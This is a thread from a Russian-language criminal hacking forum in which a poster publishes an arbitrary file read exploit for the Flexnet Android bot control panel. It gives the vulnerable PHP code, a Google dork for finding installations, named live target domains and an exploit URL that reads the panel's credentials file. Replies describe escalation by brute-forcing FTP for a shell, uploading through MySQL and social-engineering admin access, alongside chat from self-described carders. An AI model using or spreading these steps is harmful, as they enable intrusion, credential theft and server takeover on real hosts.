1. Внимание!!! Не заходит на форум? Хотите сохранить доступность к нам на 99.9%? Обязательно запишите все зеркала проекта! Именно по этому мы настоятельно рекомендуем использовать онион домен для TOR-Браузера, там доступность форума будет максимальной. Ссылка для установки и все зеркала в этой темe.

    Зеркало для TOR-Браузера - http://norabizt5qqxefxy.onion

    Чистое зеркало для обычных браузеров - https://nora.holiday

    Скрыть объявление

0day Android BOT Flexnet

Тема в разделе "КОММЕРЧЕСКИЙ ХАКИНГ", создана пользователем Mr.ROBOT, 15 июн 2017.

  1. Mr.ROBOT
    off

    Mr.ROBOT include(Happy) VIP МАГАЗИНЫ

    Сообщения:
    125
    Пол:
    Мужской
    Репутация:
    65
    Сфера:
    Хакинг
    Как всегда! Ас-саляму алейкум всему криминальному миру! Все началось с недобросовестного барыги из этой темы, где то он даже прошел проверку, но мы его расчехлили. По итогам получится 0day и хек панели с использованием СИ. Нам удалось поломать Android BOT'a Flexnet, но там нечего сытного. Давайте начнем с уязвимости в панели управления Android BOT'a Flexnet!

    Открываем controller.php и находим следующий код:
    Код:
    case 'get_dump':
       if(isset($_GET['dump']) && is_admin())
       {
         if (file_exists($_GET['dump']))
         {
           if (ob_get_level()) {
             ob_end_clean();
           }
           header('Content-Description: File Transfer');
           header('Content-Type: application/octet-stream');
           header('Content-Disposition: attachment; filename=' . basename(DOMAIN.'_set_dump.json'));
           header('Content-Transfer-Encoding: binary');
           header('Expires: 0');
           header('Cache-Control: must-revalidate');
           header('Pragma: public');
           header('Content-Length: ' . filesize($_GET['dump']));
           readfile($_GET['dump']);
           exit;
         }
       }
    break;
    
    Этот кусок кода открывает нам прекрасную уязвимость "Чтение файлов на сервере", но как видим функция авторизации is_admin() нам все же необходима.

    Пример использования СИ:

    2.png


    Так же после брута формы, удалось найти еще доступ 123

    Определение бота возможно по:

    http://macsevi9.beget.tech/controller.php?mode=get_dump (ответ{"response":[],"status":"ok"})
    http://macsevi9.beget.tech/help/

    Поиск пациентов в Google:

    Код:
    inurl:/help Flexnet: инструкция по применению
    Нашлось сразу!
    http://utuiuln.info
    http://www.mkeks.ru
    http://www.karapuz.eu/help/

    Использование уязвимости:

    DOMAIN.COM/controller.php?mode=get_dump&dump=inc/constants.php

    Пример:

    1.png

    Тут у пациента был хостинг Beget.com и панель найти было не так уж и сложно https://cp.beget.com/mysql
    Копать есть куда, можно и залиться, можно управлять, слить, можно копать дальше на сервер с чтением файлов.

    Автор MrROBOT
     
  2. ARMANI
    off

    ARMANI GUM УЧАСТНИКИ

    Сообщения:
    83
    Пол:
    Мужской
    Адрес:
    MOSCOW
    Репутация:
    7
    Сфера:
    Кардинг
    Chto mogno pridymat s chteniem na servere?
     
  3. Mr.ROBOT
    off

    Mr.ROBOT include(Happy) VIP МАГАЗИНЫ

    Сообщения:
    125
    Пол:
    Мужской
    Репутация:
    65
    Сфера:
    Хакинг
    Развить можно по разному и это только зацепка :)

    Например:
    • Брут /etc/ftpusers = фтп + шелл
    • Если есть права, то пробовать залиться через mysql
    • Доступ к другим вещам и хостам где можно залиться
     
    Последнее редактирование: 15 июн 2017
  4. bul!k
    off

    bul!k Бываю в Норе УЧАСТНИКИ

    Сообщения:
    35
    Пол:
    Мужской
    Адрес:
    <noindex>
    Репутация:
    3
    Сфера:
    Кардинг
    Сами приходят :D Можно по форумам раскидать темы типа нужен андройд бот с серверов в аренду, бюджет 700$
     
  5. Vooooo
    off

    Vooooo Зародыш УЧАСТНИКИ

    Сообщения:
    18
    Пол:
    Мужской
    Адрес:
    home
    Репутация:
    3
    Сфера:
    Кардинг
    Други чем формы брутить?
     
  6. robert33
    off

    robert33 Зародыш УЧАСТНИКИ

    Сообщения:
    15
    Пол:
    Мужской
    Адрес:
    Владимирская
    Репутация:
    3
    Сфера:
    Вирусология
  7. fisher
    off

    fisher ..::only girl::.. УЧАСТНИКИ

    Сообщения:
    25
    Пол:
    Мужской
    Адрес:
    bangkok
    Репутация:
    1
    Сфера:
    Кардинг
    Сайт заблокирован хостинг-провайдером, кто то написал или увидел.
    Статья может сойти за рекламу хостинга, ты с них денег не брал?:)
    Шучу конечно... Полет нормальный! +